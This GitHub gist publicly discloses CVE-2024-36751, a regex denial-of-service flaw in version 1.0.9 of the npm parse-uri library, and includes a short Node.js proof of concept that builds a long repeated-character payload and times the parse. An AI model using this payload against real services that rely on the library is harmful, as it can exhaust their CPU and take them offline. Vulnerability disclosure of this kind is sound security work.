Skip to content

Instantly share code, notes, and snippets.

@6en6ar
Created January 15, 2025 12:21
Show Gist options
  • Save 6en6ar/78168687da94e8aa2e0357f2456b0233 to your computer and use it in GitHub Desktop.
Save 6en6ar/78168687da94e8aa2e0357f2456b0233 to your computer and use it in GitHub Desktop.
Public disclosure for a security issue inside parse-uri library
Product: https://www.npmjs.com/package/parse-uri
Version: v1.0.9
Vulnerability type: Denial of Service
CVE ID: CVE-2024-36751
Description: There is a possible Denial of service when repeating characters are added to a url being parsed.
It seems that the regex for checking the url on line 28. and 29. in index.jsis vulnerable to regex denial of service;
Github issue: https://github.com/Kikobeats/parse-uri/issues/14
PoC:
const parseUri = require('parse-uri')
console.time('[ + ] Time passed -> ');
payload = 'https://0' + '@/@.44'.repeat(45502) + '\x00.'.repeat(45502)
parseUri(payload)
//parseUri('https://google.com')
console.timeEnd('[ + ] Time passed -> ');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment